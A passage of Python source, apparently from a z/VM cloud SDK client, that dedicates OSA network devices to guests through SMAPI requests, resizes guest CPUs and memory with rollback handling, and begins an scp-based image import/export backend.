nic_info = self._NetDbOperator.switch_select_record(userid=userid,
nic_id=nic_id, vswitch=vswitch)
return nic_info
def is_first_network_config(self, userid):
action = "get guest '%s' to database" % userid
with zvmutils.log_and_reraise_sdkbase_error(action):
info = self._GuestDbOperator.get_guest_by_userid(userid)
# check net_set
if int(info[3]) == 0:
return True
else:
return False
def update_guestdb_with_net_set(self, userid):
action = "update guest '%s' in database" % userid
with zvmutils.log_and_reraise_sdkbase_error(action):
self._GuestDbOperator.update_guest_by_userid(userid, net_set='1')
def _is_OSA_free(self, OSA_device):
osa_info = self._query_OSA()
if 'OSA' not in osa_info.keys():
return False
elif len(osa_info['OSA']['FREE']) == 0:
return False
else:
dev1 = str(OSA_device).zfill(4).upper()
dev2 = str(str(hex(int(OSA_device, 16) + 1))[2:]).zfill(4).upper()
dev3 = str(str(hex(int(OSA_device, 16) + 2))[2:]).zfill(4).upper()
if ((dev1 in osa_info['OSA']['FREE']) and
(dev2 in osa_info['OSA']['FREE']) and
(dev3 in osa_info['OSA']['FREE'])):
return True
else:
return False
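# Worked example of the check above: for OSA_device '1000' the three
# consecutive addresses '1000', '1001' and '1002' must all appear in
# osa_info['OSA']['FREE'] for the device to be considered free (the SDK
# dedicates OSA devices as a group of three consecutive addresses, see
# _dedicate_OSA below).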
def _query_OSA(self):
smt_userid = zvmutils.get_smt_userid()
rd = "SMAPI %s API Virtual_Network_OSA_Query" % smt_userid
OSA_info = {}
try:
results = self._request(rd)
rd_list = results['response']
except exception.SDKSMTRequestFailed as err:
if ((err.results['rc'] == 4) and (err.results['rs'] == 4)):
msg = 'No OSAs on system'
LOG.info(msg)
return OSA_info
else:
action = "query OSA details info"
msg = "Failed to %s. " % action
msg += "SMT error: %s" % err.format_message()
LOG.error(msg)
raise exception.SDKSMTRequestFailed(err.results, msg)
with zvmutils.expect_invalid_resp_data():
idx_end = len(rd_list)
idx = 0
def _parse_value(data_list, idx, keyword, offset=1):
value = data_list[idx].rpartition(keyword)[2].strip()
return idx + offset, value
# Start to analyse the osa devices info
while((idx < idx_end) and
rd_list[idx].__contains__('OSA Address')):
idx, osa_addr = _parse_value(rd_list, idx,
'OSA Address: ')
idx, osa_status = _parse_value(rd_list, idx,
'OSA Status: ')
idx, osa_type = _parse_value(rd_list, idx,
'OSA Type: ')
if osa_type != 'UNKNOWN':
idx, CHPID_addr = _parse_value(rd_list, idx,
'CHPID Address: ')
idx, Agent_status = _parse_value(rd_list, idx,
'Agent Status: ')
if osa_type not in OSA_info.keys():
OSA_info[osa_type] = {}
OSA_info[osa_type]['FREE'] = []
OSA_info[osa_type]['BOXED'] = []
OSA_info[osa_type]['OFFLINE'] = []
OSA_info[osa_type]['ATTACHED'] = []
if osa_status.__contains__('ATT'):
id = osa_status.split()[1]
item = (id, osa_addr)
OSA_info[osa_type]['ATTACHED'].append(item)
else:
OSA_info[osa_type][osa_status].append(osa_addr)
return OSA_info
def _get_available_vdev(self, userid, vdev=None):
ports_info = self._NetDbOperator.switch_select_table()
vdev_info = []
for p in ports_info:
if p['userid'] == userid.upper():
vdev_info.append(p['interface'])
if len(vdev_info) == 0:
# no nic defined for the guest
if vdev is None:
nic_vdev = CONF.zvm.default_nic_vdev
else:
nic_vdev = vdev
else:
if vdev is None:
used_vdev = max(vdev_info)
nic_vdev = str(hex(int(used_vdev, 16) + 3))[2:]
else:
if self._is_vdev_valid(vdev, vdev_info):
nic_vdev = vdev
else:
errmsg = ("The specified virtual device number %s "
"has already been used." % vdev)
raise exception.SDKConflictError(modID='network', rs=6,
vdev=vdev, userid=userid,
msg=errmsg)
if ((len(nic_vdev) > 4) or
(len(str(hex(int(nic_vdev, 16) + 2))[2:]) > 4)):
errmsg = ("Virtual device number %s is not valid" % nic_vdev)
raise exception.SDKInvalidInputFormat(msg=errmsg)
return nic_vdev
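# Worked example of the vdev selection above (hypothetical guest):
#   - no NIC defined and vdev=None      -> CONF.zvm.default_nic_vdev
#   - NICs up to '1000' and vdev=None   -> hex(0x1000 + 3) = '1003'
#   - vdev='2000' already in vdev_info  -> SDKConflictError (rs=6)
# The +3 offset presumably leaves room for the three consecutive device
# addresses used by the previous NIC.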
def dedicate_OSA(self, userid, OSA_device, vdev=None, active=False):
nic_vdev = self._get_available_vdev(userid, vdev=vdev)
if not self._is_OSA_free(OSA_device):
errmsg = ("The specified OSA device number %s "
"is not free" % OSA_device)
raise exception.SDKConflictError(modID='network', rs=14,
osa=OSA_device, userid=userid,
msg=errmsg)
LOG.debug('Nic attributes: vdev is %(vdev)s, '
'dedicated OSA device is %(osa)s',
{'vdev': nic_vdev,
'osa': OSA_device})
self._dedicate_OSA(userid, OSA_device, nic_vdev, active=active)
return nic_vdev
def _dedicate_OSA_inactive_exception(self, error, userid, vdev,
OSA_device):
if ((error.results['rc'] == 400) and (error.results['rs'] == 12)):
obj_desc = "Guest %s" % userid
raise exception.SDKConflictError(modID='network', rs=15,
osa=OSA_device, userid=userid,
obj=obj_desc)
elif ((error.results['rc'] == 404) and (error.results['rs'] == 12)):
obj_desc = "Guest device %s" % vdev
raise exception.SDKConflictError(modID='network', rs=15,
osa=OSA_device, userid=userid,
obj=obj_desc)
elif ((error.results['rc'] == 404) and (error.results['rs'] == 4)):
errmsg = error.format_message()
raise exception.SDKConflictError(modID='network', rs=14,
osa=OSA_device, userid=userid,
msg=errmsg)
else:
raise error
def _dedicate_OSA_active_exception(self, error, userid, OSA_device):
if (((error.results['rc'] == 204) and (error.results['rs'] == 4)) or
((error.results['rc'] == 204) and (error.results['rs'] == 8)) or
((error.results['rc'] == 204) and (error.results['rs'] == 16))):
errmsg = error.format_message()
raise exception.SDKConflictError(modID='network', rs=14,
osa=OSA_device, userid=userid,
msg=errmsg)
else:
raise error
def _dedicate_OSA(self, userid, OSA_device, vdev, active=False):
if active:
self._is_active(userid)
msg = ('Start to dedicate nic device %(vdev)s of guest %(vm)s '
'to OSA device %(osa)s'
% {'vdev': vdev, 'vm': userid, 'osa': OSA_device})
LOG.info(msg)
def_vdev = vdev
att_OSA_device = OSA_device
for i in range(3):
requestData = ' '.join((
'SMAPI %s API Image_Device_Dedicate_DM' %
userid,
"--operands",
"-v %s" % def_vdev,
"-r %s" % att_OSA_device))
try:
self._request(requestData)
except (exception.SDKSMTRequestFailed,
exception.SDKInternalError) as err:
LOG.error("Failed to dedicate OSA %s to nic %s for user %s "
"in the guest's user direct, error: %s" %
(att_OSA_device, def_vdev, userid,
err.format_message()))
# TODO revoke the dedicated OSA in user direct
while (int(def_vdev, 16) != int(vdev, 16)):
def_vdev = str(hex(int(def_vdev, 16) - 1))[2:]
requestData = ' '.join((
'SMAPI %s API Image_Device_Undedicate_DM' %
userid,
"--operands",
"-v %s" % def_vdev))
try:
self._request(requestData)
except (exception.SDKSMTRequestFailed,
exception.SDKInternalError) as err2:
if ((err2.results['rc'] == 404) and
(err2.results['rs'] == 8)):
pass
else:
LOG.error("Failed to Undedicate nic %s for user"
" %s in the guest's user direct, "
"error: %s" %
(def_vdev, userid,
err2.format_message()))
pass
self._dedicate_OSA_inactive_exception(err, userid, vdev,
OSA_device)
def_vdev = str(hex(int(def_vdev, 16) + 1))[2:]
att_OSA_device = str(hex(int(att_OSA_device, 16) + 1))[2:]
if active:
def_vdev = vdev
att_OSA_device = OSA_device
for i in range(3):
requestData = ' '.join((
'SMAPI %s API Image_Device_Dedicate' %
userid,
"--operands",
"-v %s" % def_vdev,
"-r %s" % att_OSA_device))
try:
self._request(requestData)
except (exception.SDKSMTRequestFailed,
exception.SDKInternalError) as err:
LOG.error("Failed to dedicate OSA %s to nic %s for user "
"%s on the active guest system, error: %s" %
(att_OSA_device, def_vdev, userid,
err.format_message()))
# TODO revoke the dedicated OSA in user direct and active
detach_vdev = vdev
for j in range(3):
requestData = ' '.join((
'SMAPI %s API Image_Device_Undedicate_DM' %
userid,
"--operands",
"-v %s" % detach_vdev))
try:
self._request(requestData)
except (exception.SDKSMTRequestFailed,
exception.SDKInternalError) as err2:
if ((err2.results['rc'] == 404) and
(err2.results['rs'] == 8)):
pass
else:
LOG.error("Failed to Undedicate nic %s for "
"user %s in the guest's user "
"direct, error: %s" %
(def_vdev, userid,
err2.format_message()))
pass
detach_vdev = str(hex(int(detach_vdev, 16) + 1))[2:]
while (int(def_vdev, 16) != int(vdev, 16)):
def_vdev = str(hex(int(def_vdev, 16) - 1))[2:]
requestData = ' '.join((
'SMAPI %s API Image_Device_Undedicate' %
userid,
"--operands",
"-v %s" % def_vdev))
try:
self._request(requestData)
except (exception.SDKSMTRequestFailed,
exception.SDKInternalError) as err3:
if ((err3.results['rc'] == 204) and
(err3.results['rs'] == 8)):
pass
else:
LOG.error("Failed to Undedicate nic %s for "
"user %s on the active guest "
"system, error: %s" %
(def_vdev, userid,
err3.format_message()))
pass
self._dedicate_OSA_active_exception(err, userid,
OSA_device)
def_vdev = str(hex(int(def_vdev, 16) + 1))[2:]
att_OSA_device = str(hex(int(att_OSA_device, 16) + 1))[2:]
OSA_desc = 'OSA=%s' % OSA_device
self._NetDbOperator.switch_add_record(userid, vdev, comments=OSA_desc)
msg = ('Dedicate nic device %(vdev)s of guest %(vm)s '
'to OSA device %(osa)s successfully'
% {'vdev': vdev, 'vm': userid, 'osa': OSA_device})
LOG.info(msg)
def _undedicate_nic_active_exception(self, error, userid, vdev):
if ((error.results['rc'] == 204) and (error.results['rs'] == 44)):
errmsg = error.format_message()
raise exception.SDKConflictError(modID='network', rs=16,
userid=userid, vdev=vdev,
msg=errmsg)
else:
raise error
def _undedicate_nic_inactive_exception(self, error, userid, vdev):
if ((error.results['rc'] == 400) and (error.results['rs'] == 12)):
obj_desc = "Guest %s" % userid
raise exception.SDKConflictError(modID='network', rs=17,
userid=userid, vdev=vdev,
obj=obj_desc)
else:
raise error
def _undedicate_nic(self, userid, vdev, active=False,
del_active_only=False):
if active:
self._is_active(userid)
msg = ('Start to undedicate nic device %(vdev)s of guest %(vm)s'
% {'vdev': vdev, 'vm': userid})
LOG.info(msg)
if not del_active_only:
def_vdev = vdev
for i in range(3):
requestData = ' '.join((
'SMAPI %s API Image_Device_Undedicate_DM' %
userid,
"--operands",
"-v %s" % def_vdev))
try:
self._request(requestData)
except (exception.SDKSMTRequestFailed,
exception.SDKInternalError) as err:
results = err.results
emsg = err.format_message()
if ((results['rc'] == 404) and
(results['rs'] == 8)):
LOG.warning("Virtual device %s does not exist in "
"the guest's user direct", vdev)
else:
LOG.error("Failed to undedicate nic %s for %s in "
"the guest's user direct, error: %s" %
(vdev, userid, emsg))
self._undedicate_nic_inactive_exception(err, userid, vdev)
def_vdev = str(hex(int(def_vdev, 16) + 1))[2:]
self._NetDbOperator.switch_delete_record_for_nic(userid, vdev)
if active:
def_vdev = vdev
for i in range(3):
rd = ' '.join((
"SMAPI %s API Image_Device_Undedicate" %
userid,
"--operands",
'-v %s' % def_vdev))
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err:
results = err.results
emsg = err.format_message()
if ((results['rc'] == 204) and
(results['rs'] == 8)):
LOG.warning("Virtual device %s does not exist on "
"the active guest system", vdev)
else:
LOG.error("Failed to undedicate nic %s for %s on "
"the active guest system, error: %s" %
(vdev, userid, emsg))
self._undedicate_nic_active_exception(err, userid,
vdev)
def_vdev = str(hex(int(def_vdev, 16) + 1))[2:]
msg = ('Undedicate nic device %(vdev)s of guest %(vm)s successfully'
% {'vdev': vdev, 'vm': userid})
LOG.info(msg)
def _request_with_error_ignored(self, rd):
"""Send smt request, log and ignore any errors."""
try:
return self._request(rd)
except Exception as err:
# log as warning and ignore namelist operation failures
LOG.warning(six.text_type(err))
def namelist_add(self, namelist, userid):
rd = ''.join(("SMAPI %s API Name_List_Add " % namelist,
"--operands -n %s" % userid))
self._request_with_error_ignored(rd)
def namelist_remove(self, namelist, userid):
rd = ''.join(("SMAPI %s API Name_List_Remove " % namelist,
"--operands -n %s" % userid))
self._request_with_error_ignored(rd)
def namelist_query(self, namelist):
rd = "SMAPI %s API Name_List_Query" % namelist
resp = self._request_with_error_ignored(rd)
if resp is not None:
return resp['response']
else:
return []
def namelist_destroy(self, namelist):
rd = "SMAPI %s API Name_List_Destroy" % namelist
self._request_with_error_ignored(rd)
def _get_defined_cpu_addrs(self, userid):
user_direct = self.get_user_direct(userid)
defined_addrs = []
max_cpus = 0
for ent in user_direct:
if ent.startswith("CPU"):
cpu_addr = ent.split()[1].strip().upper()
defined_addrs.append(cpu_addr)
if ent.startswith("MACHINE ESA"):
max_cpus = int(ent.split()[2].strip())
return (max_cpus, defined_addrs)
def _get_available_cpu_addrs(self, used_addrs, max_cpus):
# Get available CPU addresses that are not defined in user entry
used_set = set(used_addrs)
available_addrs = set([hex(i)[2:].rjust(2, '0').upper()
for i in range(0, max_cpus)])
available_addrs.difference_update(used_set)
return list(available_addrs)
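# Worked example of the address math above: with max_cpus=4 and
# used_addrs=['00', '02'], the candidate set is {'00', '01', '02', '03'}
# and the returned (unordered) list is ['01', '03'].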
def _get_active_cpu_addrs(self, userid):
# Get the active cpu addrs in two-digit hex string in upper case
# Sample output for 'lscpu --parse=ADDRESS':
# # The following is the parsable format, which can be fed to other
# # programs. Each different item in every column has an unique ID
# # starting from zero.
# # Address
# 0
# 1
active_addrs = []
active_cpus = self.execute_cmd(userid, "lscpu --parse=ADDRESS")
for c in active_cpus:
# Skip the comment lines at beginning
if c.startswith("# "):
continue
addr = hex(int(c.strip()))[2:].rjust(2, '0').upper()
active_addrs.append(addr)
return active_addrs
def resize_cpus(self, userid, count):
# Check defined cpus in user entry. If greater than requested, then
# delete cpus. Otherwise, add new cpus.
# Return value: for revert usage, a tuple of
# action: The action taken for this resize, possible values:
# 0: no action, 1: add cpu, 2: delete cpu
# cpu_addrs: list of influenced cpu addrs
action = 0
updated_addrs = []
(max_cpus, defined_addrs) = self._get_defined_cpu_addrs(userid)
defined_count = len(defined_addrs)
# Check maximum cpu count defined
if max_cpus == 0:
LOG.error("Resize for guest '%s' cann't be done. The maximum "
"number of cpus is not defined in user directory." %
userid)
raise exception.SDKConflictError(modID='guest', rs=3,
userid=userid)
# Check requested count is less than the maximum cpus
if count > max_cpus:
LOG.error("Resize for guest '%s' cann't be done. The "
"requested number of cpus: '%i' exceeds the maximum "
"number of cpus allowed: '%i'." %
(userid, count, max_cpus))
raise exception.SDKConflictError(modID='guest', rs=4,
userid=userid,
req=count, max=max_cpus)
# Check count and take action
if defined_count == count:
LOG.info("The number of current defined CPUs in user '%s' equals "
"to requested count: %i, no action for static resize"
"needed." % (userid, count))
return (action, updated_addrs, max_cpus)
elif defined_count < count:
action = 1
# add more CPUs
available_addrs = self._get_available_cpu_addrs(defined_addrs,
max_cpus)
# sort the list and get the first few addrs to use
available_addrs.sort()
# Define new cpus in user directory
rd = ''.join(("SMAPI %s API Image_Definition_Update_DM " % userid,
"--operands"))
updated_addrs = available_addrs[0:count - defined_count]
for addr in updated_addrs:
rd += (" -k CPU=CPUADDR=%s" % addr)
try:
self._request(rd)
except exception.SDKSMTRequestFailed as e:
msg = ("Define new cpus in user directory for '%s' failed with"
" SMT error: %s" % (userid, e.format_message()))
LOG.error(msg)
raise exception.SDKGuestOperationError(rs=6, userid=userid,
err=e.format_message())
LOG.info("New CPUs defined in user directory for '%s' "
"successfully" % userid)
return (action, updated_addrs, max_cpus)
else:
action = 2
# Delete CPUs
defined_addrs.sort()
updated_addrs = defined_addrs[-(defined_count - count):]
# Delete the last few cpus in user directory
rd = ''.join(("SMAPI %s API Image_Definition_Delete_DM " % userid,
"--operands"))
for addr in updated_addrs:
rd += (" -k CPU=CPUADDR=%s" % addr)
try:
self._request(rd)
except exception.SDKSMTRequestFailed as e:
msg = ("Delete CPUs in user directory for '%s' failed with"
" SMT error: %s" % (userid, e.format_message()))
LOG.error(msg)
raise exception.SDKGuestOperationError(rs=6, userid=userid,
err=e.format_message())
LOG.info("CPUs '%s' deleted from user directory for '%s' "
"successfully" % (str(updated_addrs), userid))
return (action, updated_addrs, max_cpus)
def live_resize_cpus(self, userid, count):
# Get active cpu count and compare with requested count
# If request count is smaller than the current count, then report
# error and exit immediately.
active_addrs = self._get_active_cpu_addrs(userid)
active_count = len(active_addrs)
if active_count > count:
LOG.error("Failed to live resize cpus of guest: %(uid)s, "
"current active cpu count: %(cur)i is greater than "
"the requested count: %(req)i." %
{'uid': userid, 'cur': active_count,
'req': count})
raise exception.SDKConflictError(modID='guest', rs=2,
userid=userid,
active=active_count,
req=count)
# Static resize CPUs. (add or delete CPUs from user directory)
(action, updated_addrs, max_cpus) = self.resize_cpus(userid, count)
if active_count == count:
# active count equals to requested
LOG.info("Current active cpu count of guest: '%s' equals to the "
"requested count: '%i', no more actions needed for "
"live resize." % (userid, count))
LOG.info("Live resize cpus for guest: '%s' finished successfully."
% userid)
return
else:
# Get the number of cpus to add to active and check address
active_free = self._get_available_cpu_addrs(active_addrs,
max_cpus)
active_free.sort()
active_new = active_free[0:count - active_count]
# Do live resize
# Define new cpus
cmd_str = "vmcp def cpu " + ' '.join(active_new)
try:
self.execute_cmd(userid, cmd_str)
except exception.SDKSMTRequestFailed as err1:
# rollback and return
msg1 = ("Define cpu of guest: '%s' to active failed with . "
"error: %s." % (userid, err1.format_message()))
# Start to do rollback
if action == 0:
LOG.error(msg1)
else:
LOG.error(msg1 + (" Will revert the user directory "
"change."))
# Combine influenced cpu addrs
cpu_entries = ""
for addr in updated_addrs:
cpu_entries += (" -k CPU=CPUADDR=%s" % addr)
rd = ''
if action == 1:
# Delete added CPUs
rd = ''.join(("SMAPI %s API Image_Definition_Delete_DM"
% userid, " --operands"))
else:
# Add deleted CPUs
rd = ''.join(("SMAPI %s API Image_Definition_Create_DM"
% userid, " --operands"))
rd += cpu_entries
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err2:
msg = ("Failed to revert user directory change for '"
"%s', SMT error: %s" % (userid,
err2.format_message()))
LOG.error(msg)
else:
LOG.info("Revert user directory change for '%s' "
"successfully." % userid)
# Finally raise the exception
raise exception.SDKGuestOperationError(
rs=7, userid=userid, err=err1.format_message())
# Activate successfully, rescan in Linux layer to hot-plug new cpus
LOG.info("Added new CPUs to active configuration of guest '%s'" %
userid)
try:
self.execute_cmd(userid, "chcpu -r")
except exception.SDKSMTRequestFailed as err:
msg = err.format_message()
LOG.error("Rescan cpus to hot-plug new defined cpus for guest: "
"'%s' failed with error: %s. No rollback is done and you"
"may need to check the status and restart the guest to "
"make the defined cpus online." % (userid, msg))
raise exception.SDKGuestOperationError(rs=8, userid=userid,
err=msg)
uname_out = self.execute_cmd(userid, "uname -a")
if uname_out and len(uname_out) >= 1:
distro = uname_out[0]
else:
distro = ''
if 'ubuntu' in distro.lower():
try:
# need use chcpu -e <cpu-list> to make cpu online for Ubuntu
online_cmd = "chcpu -e " + ','.join(active_new)
self.execute_cmd(userid, online_cmd)
except exception.SDKSMTRequestFailed as err:
msg = err.format_message()
LOG.error("Enable cpus for guest: '%s' failed with error: %s. "
"No rollback is done and you may need to check the "
"status and restart the guest to make the defined "
"cpus online." % (userid, msg))
raise exception.SDKGuestOperationError(rs=15, userid=userid,
err=msg)
LOG.info("Live resize cpus for guest: '%s' finished successfully."
% userid)
def _get_defined_memory(self, userid):
user_direct = self.get_user_direct(userid)
defined_mem = max_mem = reserved_mem = -1
for ent in user_direct:
# u'USER userid password storage max privclass'
if ent.startswith("USER "):
fields = ent.split(' ')
if len(fields) != 6:
# This case should not exist if the target user
# is created by zcc and not updated manually by user
break
defined_mem = int(zvmutils.convert_to_mb(fields[3]))
max_mem = int(zvmutils.convert_to_mb(fields[4]))
# For legacy guests, the reserved memory may not be defined
if ent.startswith("COMMAND DEF STOR RESERVED"):
reserved_mem = int(zvmutils.convert_to_mb(ent.split(' ')[4]))
return (defined_mem, max_mem, reserved_mem, user_direct)
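# Illustrative user-directory lines parsed above (hypothetical guest):
#     USER ABC00001 PWD 2048M 8192M G     -> defined_mem=2048, max_mem=8192
#     COMMAND DEF STOR RESERVED 6144M     -> reserved_mem=6144
# All values are normalized to MB via zvmutils.convert_to_mb(); -1 is kept
# for any field that could not be found in the directory.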
def _replace_user_direct(self, userid, user_entry):
# user_entry can be a list or a string
entry_str = ""
if isinstance(user_entry, list):
for ent in user_entry:
if ent == "":
# skip empty line
continue
else:
entry_str += (ent + '\n')
else:
entry_str = user_entry
tmp_folder = tempfile.mkdtemp()
tmp_user_direct = os.path.join(tmp_folder, userid)
with open(tmp_user_direct, 'w') as f:
f.write(entry_str)
rd = ''.join(("SMAPI %s API Image_Replace_DM " % userid,
"--operands ",
"-f %s" % tmp_user_direct))
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err1:
msg = ("Replace definition of guest '%s' failed with "
"SMT error: %s." % (userid, err1.format_message()))
LOG.error(msg)
LOG.debug("Unlocking the user directory.")
rd = ("SMAPI %s API Image_Unlock_DM " % userid)
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err2:
# ignore 'not locked' error
if ((err2.results['rc'] == 400) and (
err2.results['rs'] == 24)):
LOG.debug("Guest '%s' unlocked successfully." % userid)
pass
else:
# just print error and ignore this unlock error
msg = ("Unlock definition of guest '%s' failed "
"with SMT error: %s" %
(userid, err2.format_message()))
LOG.error(msg)
else:
LOG.debug("Guest '%s' unlocked successfully." % userid)
# at the end, raise the replace error for upper layer to handle
raise err1
finally:
self._pathutils.clean_temp_folder(tmp_folder)
def _lock_user_direct(self, userid):
rd = ("SMAPI %s API Image_Lock_DM " % userid)
try:
self._request(rd)
except exception.SDKSMTRequestFailed as e:
# ignore the "already locked" error
if ((e.results['rc'] == 400) and (e.results['rs'] == 12)):
LOG.debug("Image is already unlocked.")
else:
msg = ("Lock definition of guest '%s' failed with"
" SMT error: %s" % (userid, e.format_message()))
LOG.error(msg)
raise e
def resize_memory(self, userid, memory):
# Check defined storage in user entry.
# Update STORAGE and RESERVED accordingly.
size = int(zvmutils.convert_to_mb(memory))
(defined_mem, max_mem, reserved_mem,
user_direct) = self._get_defined_memory(userid)
# Check max memory is properly defined
if max_mem == -1 or reserved_mem == -1:
LOG.error("Memory resize for guest '%s' cann't be done."
"Failed to get the defined/max/reserved memory size "
"from user directory." % userid)
raise exception.SDKConflictError(modID='guest', rs=19,
userid=userid)
action = 0
# Make sure requested size is less than the maximum memory size
if size > max_mem:
LOG.error("Memory resize for guest '%s' cann't be done. The "
"requested memory size: '%im' exceeds the maximum "
"size allowed: '%im'." %
(userid, size, max_mem))
raise exception.SDKConflictError(modID='guest', rs=20,
userid=userid,
req=size, max=max_mem)
# check if already satisfy request
if defined_mem == size:
LOG.info("The current defined memory size in user '%s' equals "
"to requested size: %im, no action for memory resize "
"needed." % (userid, size))
return (action, defined_mem, max_mem, user_direct)
else:
# set action to 1 to represent that revert need to be done when
# live resize failed.
action = 1
# get the new reserved memory size
new_reserved = max_mem - size
# prepare the new user entry content
entry_str = ""
for ent in user_direct:
if ent == '':
# Avoid adding an empty line in the entry file
# otherwise Image_Replace_DM would return syntax error.
continue
new_ent = ""
if ent.startswith("USER "):
fields = ent.split(' ')
for i in range(len(fields)):
# update fields[3] to new defined size
if i != 3:
new_ent += (fields[i] + ' ')
else:
new_ent += (str(size) + 'M ')
# remove the last space
new_ent = new_ent.strip()
elif ent.startswith("COMMAND DEF STOR RESERVED"):
new_ent = ("COMMAND DEF STOR RESERVED %iM" % new_reserved)
else:
new_ent = ent
# append this new entry
entry_str += (new_ent + '\n')
# Lock and replace user definition with the new_entry content
try:
self._lock_user_direct(userid)
except exception.SDKSMTRequestFailed as e:
raise exception.SDKGuestOperationError(rs=9, userid=userid,
err=e.format_message())
LOG.debug("User directory Locked successfully for guest '%s' " %
userid)
# Replace user directory
try:
self._replace_user_direct(userid, entry_str)
except exception.SDKSMTRequestFailed as e:
raise exception.SDKGuestOperationError(rs=10,
userid=userid,
err=e.format_message())
# Finally return useful info
return (action, defined_mem, max_mem, user_direct)
def _revert_user_direct(self, userid, user_entry):
# user_entry can be a list or a string
try:
self._lock_user_direct(userid)
except exception.SDKSMTRequestFailed:
# print revert error and return
msg = ("Failed to revert user direct of guest '%s'." % userid)
LOG.error(msg)
return
LOG.debug("User directory Locked successfully for guest '%s'." %
userid)
# Replace user directory
try:
self._replace_user_direct(userid, user_entry)
except exception.SDKSMTRequestFailed:
msg = ("Failed to revert user direct of guest '%s'." % userid)
LOG.error(msg)
return
LOG.debug("User directory reverted successfully for guest '%s'." %
userid)
def _get_active_memory(self, userid):
# Return an integer value representing the active memory size in mb
output = self.execute_cmd(userid, "lsmem")
active_mem = 0
for e in output:
# cmd output contains line starts with "Total online memory",
# its format can be like:
# "Total online memory : 8192 MB"
# or
# "Total online memory: 8G"
# need handle both formats
if e.startswith("Total online memory"):
try:
# sample mem_info_str: "8192MB" or "8G"
mem_info_str = e.split(':')[1].replace(' ', '').upper()
# make mem_info as "8192M" or "8G"
if mem_info_str.endswith('B'):
mem_info = mem_info_str[:-1]
else:
mem_info = mem_info_str
active_mem = int(zvmutils.convert_to_mb(mem_info))
except (IndexError, ValueError, KeyError, TypeError) as e:
errmsg = ("Failed to get active storage size for guest: %s"
% userid)
LOG.error(errmsg + " with error: " + six.text_type(e))
raise exception.SDKInternalError(msg=errmsg)
break
return active_mem
def live_resize_memory(self, userid, memory):
# Get active memory size and compare with requested size
# If request size is smaller than the current size, then report
# error and exit immediately.
size = int(zvmutils.convert_to_mb(memory))
active_size = self._get_active_memory(userid)
if active_size > size:
LOG.error("Failed to live resize memory of guest: %(uid)s, "
"current active memory size: %(cur)im is greater than "
"the requested size: %(req)im." %
{'uid': userid, 'cur': active_size,
'req': size})
raise exception.SDKConflictError(modID='guest', rs=18,
userid=userid,
active=active_size,
req=size)
# Static resize memory. (increase/decrease memory from user directory)
(action, defined_mem, max_mem,
user_direct) = self.resize_memory(userid, memory)
# Compare active size and requested size, then update accordingly
if active_size == size:
# online memory already satisfied
LOG.info("Current active memory size of guest: '%s' equals to the "
"requested size: '%iM', no more actions needed for "
"live resize." % (userid, size))
LOG.info("Live resize memory for guest: '%s' finished "
"successfully." % userid)
return
else:
# Do live resize. update memory size
increase_size = size - active_size
# Step1: Define new standby storage
cmd_str = ("vmcp def storage standby %sM" % increase_size)
try:
self.execute_cmd(userid, cmd_str)
except exception.SDKSMTRequestFailed as e:
# rollback and return
msg = ("Define standby memory of guest: '%s' failed with "
"error: %s." % (userid, e.format_message()))
LOG.error(msg)
# Start to do rollback
if action == 1:
LOG.debug("Start to revert user definition of guest '%s'."
% userid)
self._revert_user_direct(userid, user_direct)
# Finally, raise the error and exit
raise exception.SDKGuestOperationError(rs=11,
userid=userid,
err=e.format_message())
# Step 2: Online new memory
cmd_str = ("chmem -e %sM" % increase_size)
try:
self.execute_cmd(userid, cmd_str)
except exception.SDKSMTRequestFailed as err1:
# rollback and return
msg1 = ("Online memory of guest: '%s' failed with "
"error: %s." % (userid, err1.format_message()))
LOG.error(msg1)
# Start to do rollback
LOG.info("Start to do revert.")
LOG.debug("Reverting the standby memory.")
try:
self.execute_cmd(userid, "vmcp def storage standby 0M")
except exception.SDKSMTRequestFailed as err2:
# print revert error info and continue
msg2 = ("Revert standby memory of guest: '%s' failed with "
"error: %s." % (userid, err2.format_message()))
LOG.error(msg2)
# Continue to do the user directory change.
if action == 1:
LOG.debug("Reverting the user directory change of guest "
"'%s'." % userid)
self._revert_user_direct(userid, user_direct)
# Finally raise the exception
raise exception.SDKGuestOperationError(
rs=7, userid=userid, err=err1.format_message())
LOG.info("Live resize memory for guest: '%s' finished successfully."
% userid)
def is_rhcos(self, os_version):
return os_version.lower().startswith('rhcos')
def _get_wwpn_lun(self, userid):
user_direct = self.get_user_direct(userid)
wwpn = None
lun = None
for ent in user_direct:
if ent.upper().startswith("LOADDEV PORT"):
wwpn = ent.split()[2].strip()
elif ent.upper().startswith("LOADDEV LUN"):
lun = ent.split()[2].strip()
return (wwpn, lun)
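# Illustrative LOADDEV statements parsed above (values are hypothetical):
#     LOADDEV PORT 5005076812345678   -> wwpn = '5005076812345678'
#     LOADDEV LUN  0000000000000000   -> lun  = '0000000000000000'
# Either value stays None if the corresponding statement is absent from
# the user directory.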
class FilesystemBackend(object):
@classmethod
def image_import(cls, image_name, url, target, **kwargs):
"""Import image from remote host to local image repository using scp.
If remote_host not specified, it means the source file exist in local
file system, just copy the image to image repository
"""
source = urlparse.urlparse(url).path
if kwargs['remote_host']:
if '@' in kwargs['remote_host']:
source_path = ':'.join([kwargs['remote_host'], source])
command = ' '.join(['/usr/bin/scp',
"-P", CONF.zvm.remotehost_sshd_port,
"-o StrictHostKeyChecking=no",
'-r ', source_path, target])
(rc, output) = zvmutils.execute(command)
if rc:
msg = ("Copying image file from remote filesystem failed"
" with reason: %s" % output)
LOG.error(msg)
raise exception.SDKImageOperationError(rs=10, err=output)
else:
msg = ("The specified remote_host %s format invalid" %
kwargs['remote_host'])
LOG.error(msg)
raise exception.SDKImageOperationError(rs=11,
rh=kwargs['remote_host'])
else:
LOG.debug("Remote_host not specified, will copy from local")
try:
shutil.copyfile(source, target)
except Exception as err:
msg = ("Import image from local file system failed"
" with reason %s" % six.text_type(err))
LOG.error(msg)
raise exception.SDKImageOperationError(rs=12,
err=six.text_type(err))
@classmethod
def image_export(cls, source_path, dest_url, **kwargs):
"""Export the specific image to remote host or local file system """
dest_path = urlparse.urlparse(dest_url).path
if kwargs['remote_host']:
target_path = ':'.join([kwargs['remote_host'], dest_path])
command = ' '.join(['/usr/bin/scp',
"-P", CONF.zvm.remotehost_sshd_port,
"-o StrictHostKeyChecking=no",
'-r ', source_path, target_path])
(rc, output) = zvmutils.execute(command)
if rc:
msg = ("Error happened when copying image file to remote "
"host with reason: %s" % output)
LOG.error(msg)
